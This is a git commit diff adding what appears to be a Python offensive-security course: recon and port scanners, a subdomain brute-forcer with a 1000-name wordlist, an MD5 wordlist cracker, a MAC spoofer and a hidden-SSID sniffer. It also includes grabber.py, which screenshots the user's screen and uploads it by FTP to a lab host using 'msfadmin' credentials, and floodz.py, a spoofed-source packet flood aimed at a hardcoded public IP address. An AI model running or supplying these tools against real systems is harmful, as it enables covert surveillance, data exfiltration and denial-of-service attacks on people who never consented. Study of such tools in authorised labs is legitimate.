add sourcecode

2020-11-12 17:02:10 +08:00
parent bf7c50956c
commit f698082a29
23 changed files with 2746 additions and 0 deletions
--- a/Lookup-Resources.pdf
+++ b/Lookup-Resources.pdf
--- a/01/inforecon.py
+++ b/01/inforecon.py
@@ -0,0 +1,24 @@
+import sys 
+import requests
+import socket
+import json
+
+if len(sys.argv) < 2:
+    print("Usage: " + sys.argv[0] + "<url>")
+    sys.exit(1)
+
+req = requests.get("https://"+sys.argv[1])
+print("\n"+str(req.headers))
+
+gethostby_ = socket.gethostbyname(sys.argv[1])
+print("\nThe IP address of "+sys.argv[1]+" is: "+gethostby_ + "\n")
+
+#ipinfo.io 
+
+req_two = requests.get("https://ipinfo.io/"+gethostby_+"/json")
+resp_ = json.loads(req_two.text)
+
+print("Location: "+resp_["loc"])
+print("Region: "+resp_["region"])
+print("City: "+resp_["city"])
+print("Country: "+resp_["country"])
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/02/nmapscanner.py
+++ b/02/nmapscanner.py
@@ -0,0 +1,15 @@
+import nmap 
+import sys 
+
+target = str(sys.argv[1])
+ports = [21,22,80,139,443,8080]
+
+scan_v = nmap.PortScanner()
+
+print("\nScanning",target,"for ports 21,22,80,139,443 and 8080...\n")
+
+for port in ports:
+    portscan = scan_v.scan(target,str(port))
+    print("Port",port," is ",portscan['scan'][list(portscan['scan'])[0]]['tcp'][port]['state']) 
+
+print("\nHost",target," is ",portscan['scan'][list(portscan['scan'])[0]]['status']['state'])
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/03/grabber.py
+++ b/03/grabber.py
@@ -0,0 +1,21 @@
+import wx 
+import os
+import ftplib 
+
+w = wx.App() 
+screen = wx.ScreenDC()
+size = screen.GetSize()
+bmap = wx.Bitmap(size[0],size[1])
+memo = wx.MemoryDC(bmap)
+memo.Blit(0,0,size[0],size[1],screen,0,0)
+
+del memo 
+bmap.SaveFile("grabbed.png", wx.BITMAP_TYPE_PNG)
+
+sess_ = ftplib.FTP("192.168.85.128", "msfadmin", "msfadmin")
+file_ = open("grabbed.png", "rb")
+sess_.storbinary("STOR /tmp/grabbed.png", file_)
+
+file_.close()
+sess_.quit()
+
--- a/Server-Client-Resources.pdf
+++ b/Server-Client-Resources.pdf
--- a/04/client.py
+++ b/04/client.py
@@ -0,0 +1,8 @@
+import socket
+
+sock_ = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock_.connect((socket.gethostname(),9337))
+msg = sock_.recv(1024)
+sock_.close()
+print(msg.decode("ascii"))
+
--- a/04/server.py
+++ b/04/server.py
@@ -0,0 +1,18 @@
+import socket 
+
+host = socket.gethostname()
+port = 9337
+
+sock_ = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock_.bind((host,port))
+sock_.listen(1)
+
+print("\nServer started...\n")
+
+conn,addr = sock_.accept()
+
+print("Connection established with: ",str(addr))
+
+message = "\nThank you for connecting "+str(addr)
+conn.send(message.encode("ascii"))
+conn.close()
--- a/Manipulation-Resources.pdf
+++ b/Manipulation-Resources.pdf
--- a/05/floodz.py
+++ b/05/floodz.py
@@ -0,0 +1,12 @@
+from scapy.all import *
+
+def floodz(source,target):
+    for source_p in range(100,150):
+        IPlayer = IP(src=source,dst=target)
+        TCPlayer = TCP(sport=source_p,dport=600)
+        pkt = IPlayer/TCPlayer
+        send(pkt)
+
+source = "127.0.0.1"
+target = "162.241.24.197"
+floodz(source,target)
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/07/subd.py
+++ b/07/subd.py
@@ -0,0 +1,17 @@
+import requests 
+import sys 
+
+sub_list = open("subdomains-1000.txt").read() 
+subs = sub_list.splitlines()
+
+for sub in subs:
+    url_to_check = f"http://{sub}.{sys.argv[1]}" 
+
+    try:
+        requests.get(url_to_check)
+    
+    except requests.ConnectionError: 
+        pass
+    
+    else:
+        print("Valid domain: ",url_to_check)
--- a/07/subdomains-1000.txt
+++ b/07/subdomains-1000.txt
@@ -0,0 +1,999 @@
+www
+mail
+ftp
+localhost
+webmail
+smtp
+pop
+ns1
+webdisk
+ns2
+cpanel
+whm
+autodiscover
+autoconfig
+m
+imap
+test
+ns
+blog
+pop3
+dev
+www2
+admin
+forum
+news
+vpn
+ns3
+mail2
+new
+mysql
+old
+lists
+support
+mobile
+mx
+static
+docs
+beta
+shop
+sql
+secure
+demo
+cp
+calendar
+wiki
+web
+media
+email
+images
+img
+www1
+intranet
+portal
+video
+sip
+dns2
+api
+cdn
+stats
+dns1
+ns4
+www3
+dns
+search
+staging
+server
+mx1
+chat
+wap
+my
+svn
+mail1
+sites
+proxy
+ads
+host
+crm
+cms
+backup
+mx2
+lyncdiscover
+info
+apps
+download
+remote
+db
+forums
+store
+relay
+files
+newsletter
+app
+live
+owa
+en
+start
+sms
+office
+exchange
+ipv4
+mail3
+help
+blogs
+helpdesk
+web1
+home
+library
+ftp2
+ntp
+monitor
+login
+service
+correo
+www4
+moodle
+it
+gateway
+gw
+i
+stat
+stage
+ldap
+tv
+ssl
+web2
+ns5
+upload
+nagios
+smtp2
+online
+ad
+survey
+data
+radio
+extranet
+test2
+mssql
+dns3
+jobs
+services
+panel
+irc
+hosting
+cloud
+de
+gmail
+s
+bbs
+cs
+ww
+mrtg
+git
+image
+members
+poczta
+s1
+meet
+preview
+fr
+cloudflare-resolve-to
+dev2
+photo
+jabber
+legacy
+go
+es
+ssh
+redmine
+partner
+vps
+server1
+sv
+ns6
+webmail2
+av
+community
+cacti
+time
+sftp
+lib
+facebook
+www5
+smtp1
+feeds
+w
+games
+ts
+alumni
+dl
+s2
+phpmyadmin
+archive
+cn
+tools
+stream
+projects
+elearning
+im
+iphone
+control
+voip
+test1
+ws
+rss
+sp
+wwww
+vpn2
+jira
+list
+connect
+gallery
+billing
+mailer
+update
+pda
+game
+ns0
+testing
+sandbox
+job
+events
+dialin
+ml
+fb
+videos
+music
+a
+partners
+mailhost
+downloads
+reports
+ca
+router
+speedtest
+local
+training
+edu
+bugs
+manage
+s3
+status
+host2
+ww2
+marketing
+conference
+content
+network-ip
+broadcast-ip
+english
+catalog
+msoid
+mailadmin
+pay
+access
+streaming
+project
+t
+sso
+alpha
+photos
+staff
+e
+auth
+v2
+web5
+web3
+mail4
+devel
+post
+us
+images2
+master
+rt
+ftp1
+qa
+wp
+dns4
+www6
+ru
+student
+w3
+citrix
+trac
+doc
+img2
+css
+mx3
+adm
+web4
+hr
+mailserver
+travel
+sharepoint
+sport
+member
+bb
+agenda
+link
+server2
+vod
+uk
+fw
+promo
+vip
+noc
+design
+temp
+gate
+ns7
+file
+ms
+map
+cache
+painel
+js
+event
+mailing
+db1
+c
+auto
+img1
+vpn1
+business
+mirror
+share
+cdn2
+site
+maps
+tickets
+tracker
+domains
+club
+images1
+zimbra
+cvs
+b2b
+oa
+intra
+zabbix
+ns8
+assets
+main
+spam
+lms
+social
+faq
+feedback
+loopback
+groups
+m2
+cas
+loghost
+xml
+nl
+research
+art
+munin
+dev1
+gis
+sales
+images3
+report
+google
+idp
+cisco
+careers
+seo
+dc
+lab
+d
+firewall
+fs
+eng
+ann
+mail01
+mantis
+v
+affiliates
+webconf
+track
+ticket
+pm
+db2
+b
+clients
+tech
+erp
+monitoring
+cdn1
+images4
+payment
+origin
+client
+foto
+domain
+pt
+pma
+directory
+cc
+public
+finance
+ns11
+test3
+wordpress
+corp
+sslvpn
+cal
+mailman
+book
+ip
+zeus
+ns10
+hermes
+storage
+free
+static1
+pbx
+banner
+mobil
+kb
+mail5
+direct
+ipfixe
+wifi
+development
+board
+ns01
+st
+reviews
+radius
+pro
+atlas
+links
+in
+oldmail
+register
+s4
+images6
+static2
+id
+shopping
+drupal
+analytics
+m1
+images5
+images7
+img3
+mx01
+www7
+redirect
+sitebuilder
+smtp3
+adserver
+net
+user
+forms
+outlook
+press
+vc
+health
+work
+mb
+mm
+f
+pgsql
+jp
+sports
+preprod
+g
+p
+mdm
+ar
+lync
+market
+dbadmin
+barracuda
+affiliate
+mars
+users
+images8
+biblioteca
+mc
+ns12
+math
+ntp1
+web01
+software
+pr
+jupiter
+labs
+linux
+sc
+love
+fax
+php
+lp
+tracking
+thumbs
+up
+tw
+campus
+reg
+digital
+demo2
+da
+tr
+otrs
+web6
+ns02
+mailgw
+education
+order
+piwik
+banners
+rs
+se
+venus
+internal
+webservices
+cm
+whois
+sync
+lb
+is
+code
+click
+w2
+bugzilla
+virtual
+origin-www
+top
+customer
+pub
+hotel
+openx
+log
+uat
+cdn3
+images0
+cgi
+posta
+reseller
+soft
+movie
+mba
+n
+r
+developer
+nms
+ns9
+webcam
+construtor
+ebook
+ftp3
+join
+dashboard
+bi
+wpad
+admin2
+agent
+wm
+books
+joomla
+hotels
+ezproxy
+ds
+sa
+katalog
+team
+emkt
+antispam
+adv
+mercury
+flash
+myadmin
+sklep
+newsite
+law
+pl
+ntp2
+x
+srv1
+mp3
+archives
+proxy2
+ps
+pic
+ir
+orion
+srv
+mt
+ocs
+server3
+meeting
+v1
+delta
+titan
+manager
+subscribe
+develop
+wsus
+oascentral
+mobi
+people
+galleries
+wwwtest
+backoffice
+sg
+repo
+soporte
+www8
+eu
+ead
+students
+hq
+awstats
+ec
+security
+school
+corporate
+podcast
+vote
+conf
+magento
+mx4
+webservice
+tour
+s5
+power
+correio
+mon
+mobilemail
+weather
+international
+prod
+account
+xx
+pages
+pgadmin
+bfn2
+webserver
+www-test
+maintenance
+me
+magazine
+syslog
+int
+view
+enews
+ci
+au
+mis
+dev3
+pdf
+mailgate
+v3
+ss
+internet
+host1
+smtp01
+journal
+wireless
+opac
+w1
+signup
+database
+demo1
+br
+android
+career
+listserv
+bt
+spb
+cam
+contacts
+webtest
+resources
+1
+life
+mail6
+transfer
+app1
+confluence
+controlpanel
+secure2
+puppet
+classifieds
+tunet
+edge
+biz
+host3
+red
+newmail
+mx02
+sb
+physics
+ap
+epaper
+sts
+proxy1
+ww1
+stg
+sd
+science
+star
+www9
+phoenix
+pluto
+webdav
+booking
+eshop
+edit
+panelstats
+xmpp
+food
+cert
+adfs
+mail02
+cat
+edm
+vcenter
+mysql2
+sun
+phone
+surveys
+smart
+system
+twitter
+updates
+webmail1
+logs
+sitedefender
+as
+cbf1
+sugar
+contact
+vm
+ipad
+traffic
+dm
+saturn
+bo
+network
+ac
+ns13
+webdev
+libguides
+asp
+tm
+core
+mms
+abc
+scripts
+fm
+sm
+test4
+nas
+newsletters
+rsc
+cluster
+learn
+panelstatsmail
+lb1
+usa
+apollo
+pre
+terminal
+l
+tc
+movies
+sh
+fms
+dms
+z
+base
+jwc
+gs
+kvm
+bfn1
+card
+web02
+lg
+editor
+metrics
+feed
+repository
+asterisk
+sns
+global
+counter
+ch
+sistemas
+pc
+china
+u
+payments
+ma
+pics
+www10
+e-learning
+auction
+hub
+sf
+cbf8
+forum2
+ns14
+app2
+passport
+hd
+talk
+ex
+debian
+ct
+rc
+2012
+imap4
+blog2
+ce
+sk
+relay2
+green
+print
+geo
+multimedia
+iptv
+backup2
+webapps
+audio
+ro
+smtp4
+pg
+ldap2
+backend
+profile
+oldwww
+drive
+bill
+listas
+orders
+win
+mag
+apply
+bounce
+mta
+hp
+suporte
+dir
+pa
+sys
+mx0
+ems
+antivirus
+web8
+inside
+play
+nic
+welcome
+premium
+exam
+sub
+cz
+omega
+boutique
+pp
+management
+planet
+ww3
+orange
+c1
+zzb
+form
+ecommerce
+tmp
+plus
+openvpn
+fw1
+hk
+owncloud
+history
+clientes
+srv2
+img4
+open
+registration
+mp
+blackboard
+fc
+static3
+server4
+s6
+ecard
+dspace
+dns01
+md
+mcp
+ares
+spf
+kms
+intranet2
+accounts
+webapp
+ask
+rd
+www-dev
+gw2
+mall
+bg
+teste
+ldap1
+real
+m3
+wave
+movil
+portal2
+kids
+gw1
+ra
+tienda
+private
+po
+2013
+cdn4
+gps
+km
+ent
+tt
+ns21
+at
+athena
+cbf2
+webmail3
+mob
+matrix
+ns15
+send
+lb2
+pos
+2
+cl
+renew
+admissions
+am
+beta2
+gamma
+mx5
+portfolio
+contest
+box
+mg
+wwwold
+neptune
+mac
+pms
+traveler
+media2
+studio
+sw
+imp
+bs
+alfa
+cbf4
+servicedesk
+wmail
+video2
+switch
+sam
+sky
+ee
+widget
+reklama
+msn
+paris
+tms
+th
+vega
+trade
+intern
+ext
+oldsite
+learning
+group
+f1
+ns22
+ns20
+demo3
+bm
+dom
+pe
+annuaire
+portail
+graphics
+iris
+one
+robot
+ams
+s7
+foro
+gaia
+vpn3
--- a/Hashlib-Resources.pdf
+++ b/Hashlib-Resources.pdf
--- a/08/dict.txt
+++ b/08/dict.txt
--- a/08/md5crack.py
+++ b/08/md5crack.py
@@ -0,0 +1,21 @@
+import hashlib
+import argparse
+
+parser = argparse.ArgumentParser(description="MD5 Cracker")
+parser.add_argument("-md5", dest="hash", help="md5 hash", required=True)
+parser.add_argument("-w", dest="wordlist", help="wordlist", required=True)
+parsed_args = parser.parse_args()
+
+def main(): 
+    hash_cracked = ""
+    with open(parsed_args.wordlist) as file:
+        for line in file:
+            line = line.strip()
+            if hashlib.md5(bytes(line,encoding="utf-8")).hexdigest() == parsed_args.hash:
+                hash_cracked = line
+                print("\nMD5-hash has been successfully cracked. The value is %s."%line)
+    if hash_cracked == "":
+        print("\nFailed to crack the hash. Try using a bigger/different dictionary.")
+
+if __name__ == "__main__":
+    main()
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/09/macspoof.py
+++ b/09/macspoof.py
@@ -0,0 +1,22 @@
+import random
+import os
+import subprocess 
+
+def get_rand():
+    return random.choice("abcdef0123456789") 
+
+def new_mac():
+    new_ = "" 
+    for i in range(0,5):
+        new_ += get_rand() + get_rand() + ":"  
+    new_ += get_rand() + get_rand() 
+    return new_
+
+print(os.system("ifconfig eth0 | grep ether | grep -oE [0-9abcdef:]{17}")) 
+subprocess.call(["sudo","ifconfig","eth0","down"]) 
+new_m = new_mac() 
+subprocess.call(["sudo","ifconfig","eth0","hw","ether","%s"%new_m]) 
+subprocess.call(["sudo","ifconfig","eth0","up"]) 
+print(os.system("ifconfig eth0 | grep ether | grep -oE [0-9abcdef:]{17}"))
+
+
--- a/Python-Resources.pdf
+++ b/Python-Resources.pdf
--- a/10/hiddenwifi.py
+++ b/10/hiddenwifi.py
@@ -0,0 +1,14 @@
+from scapy.all import *
+import os
+
+iface = "wlan0"
+
+def h_packet(packet):
+    if packet.haslayer(Dot11ProbeReq) or packet.haslayer(Dot11ProbeResp) or packet.haslayer(Dot11AssoReq):
+        print "SSID identified " + packet.info
+
+os.system("iwconfig " + iface + "mode monitor")
+
+print "Sniffing traffic on interface " + iface
+sniff(iface=iface, prn=h_packet)
+
--- a/Resources-Resources.pdf
+++ b/Resources-Resources.pdf